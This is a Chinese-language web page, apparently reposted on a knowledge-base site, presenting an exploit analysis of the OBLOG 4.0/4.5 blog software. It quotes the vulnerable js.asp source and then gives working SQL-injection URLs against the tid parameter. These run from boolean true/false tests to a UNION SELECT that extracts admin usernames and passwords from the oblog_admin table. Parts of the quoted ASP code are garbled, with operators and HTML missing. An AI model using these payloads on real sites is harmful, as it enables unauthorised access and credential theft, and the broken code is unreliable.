主页 > 知识库 > OBLOG4.0 OBLOG4.5漏洞利用分析

OBLOG4.0 OBLOG4.5漏洞利用分析

热门标签:检查注册表项 银行业务 美图手机 网站文章发布 服务器配置 铁路电话系统 智能手机 呼叫中心市场需求
来源:Deepen Study

漏洞文件:js.asp
%
Dim oblog
set oblog=new class_sys
oblog.autoupdate=False
oblog.start
dim js_blogurl,n
js_blogurl=Trim(oblog.CacheConfig(3))
n=CInt(Request(”n”))
if n=0 then n=1
select case CInt(Request(”j”))
case 1
call tongji()
case 2
call topuser()
case 3
call adduser()
case 4
call listclass()
case 5
call showusertype()
case 6
call listbestblog()
case 7
call showlogin()
case 8
call showplace()
case 9
call showphoto()
case 10
call showblogstars()
Case 11
Call show_hotblog()
Case 12
Call show_teams()
Case 13
Call show_posts()
Case 14
Call show_hottag()
case 0
call showlog()
end select
****************省略部分代码******************
Sub show_posts()
Dim teamid,postnum,l,u,t
teamid=Request(”tid”)
postnum=n
l=CInt(Request(”l”))
u=CInt(Request(”u”))
t=CInt(Request(”t”))
Dim rs,sql,sRet,sAddon
Sql=”select Top ”  postnum  ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”
If teamid>“” And teamid>“0″ Then
teamid=Replace(teamid,”|”,”,”)
Sql=Sql  ” And teamid In (”  teamid  “) ”
End If
Sql=Sql  ” order by postid Desc”
Set rs=oblog.Execute(Sql)
sRet=”

 ”
 Do While Not rs.Eof
 sAddon=”"
 * sRet=sRet  “ ”  oblog.Filt_html(Left(rs(2),l))  “”
 If u=1 Then sAddon=rs(4)
 if t=1 Then
 If sAddon>“” Then sAddon=sAddon  “,”
 sAddon=sAddon  rs(3)
 End If
 If sAddon>“” Then sAddon=”(”  sAddon  “)”
 sRet=sRet  sAddon  “

 ”
 rs.Movenext
 Loop
 Set rs = Nothing
 sRet=sRet  “


Response.write oblog.htm2js (sRet,True)
End Sub
调用show_posts()过程必须要符合上面的参数n=1,j=13
(”  teamid  “)
http://www.oblog.com.cn/js.asp?n=1j=13tid=1
http://www.oblog.com.cn/js.asp?n=1j=13tid=1) and 1=1 and (1=1 返回正常
http://www.oblog.com.cn/js.asp?n=1j=13tid=1) and 1=1 and (1=2 返回异常
猜管理员表名
http://www.oblog.com.cn/js.asp?n=1j=13tid=1) and 查询语句 and (1=1

Sql=”select Top ”  postnum  ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”

http://www.oblog.com.cn/js.asp?n=1j=13tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1

document.write('

*

‘);

gid=1跟pid=2里的1,2就是了 直接替换里面的1,2为username,password

http://www.oblog.com.cn/js.asp?n=1j=13tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1 

标签:上海 长治 河南 新疆 沈阳 乐山 红河 沧州

巨人网络通讯声明:本文标题《OBLOG4.0 OBLOG4.5漏洞利用分析》,本文关键词  ;如发现本文内容存在版权问题,烦请提供相关信息告之我们,我们将及时沟通与处理。本站内容系统采集于网络,涉及言论、版权与本站无关。
  • 相关文章
  • 收缩
    • 微信客服
    • 微信二维码
    • 电话咨询

    • 400-1100-266